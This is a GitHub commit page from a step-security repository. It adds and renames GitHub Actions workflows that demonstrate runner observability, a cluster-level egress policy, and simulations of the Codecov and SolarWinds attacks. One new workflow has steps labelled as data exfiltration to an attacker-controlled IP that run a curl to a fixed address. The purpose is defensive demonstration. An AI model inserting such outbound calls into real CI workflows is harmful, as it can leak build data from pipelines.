Skip to content

Commit 73ed74a

Browse files
Merge pull request step-security#149 from step-security/add-workflows
Add ARC workflows
2 parents f268f74 + 5c5d20c commit 73ed74a

4 files changed

Lines changed: 38 additions & 3 deletions

File tree

.github/workflows/arc-codecov-simulation.yml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
1-
name: ARC Codecov Simulation
1+
name: 3. ARC Codecov Simulation
22
on:
33
workflow_dispatch:
4-
4+
55
jobs:
66
arc-codecov-simulation:
77
runs-on: self-hosted
Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
name: 2. Secure-By-Default ARC Cluster-Level Policy
2+
on:
3+
workflow_dispatch:
4+
5+
jobs:
6+
direct-ip-hosted:
7+
runs-on: ubuntu-latest
8+
steps:
9+
- uses: actions/checkout@v3
10+
11+
# Codecov Scenario: Exfiltrate data to attacker's IP address
12+
- name: Data Exfiltration To Attacker Controlled IP address
13+
run: curl 104.16.209.12 -L
14+
direct-ip-arc:
15+
runs-on: self-hosted
16+
steps:
17+
- uses: actions/checkout@v3
18+
19+
# Codecov Scenario: Exfiltrate data to attacker's IP address
20+
- name: Data Exfiltration To Attacker Controlled IP address
21+
run: curl 104.16.209.12 -L

.github/workflows/arc-solarwinds-simulation.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,4 @@
1-
name: ARC SolarWinds Simulation
1+
name: 4. ARC SolarWinds Simulation
22
on:
33
workflow_dispatch:
44

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
name: 1. Zero-effort Observability
2+
on:
3+
workflow_dispatch:
4+
5+
jobs:
6+
observability:
7+
runs-on: self-hosted
8+
permissions:
9+
contents: read
10+
steps:
11+
- uses: actions/checkout@v2
12+
13+
- name: Build Docker image
14+
run: docker build .

0 commit comments

Comments
 (0)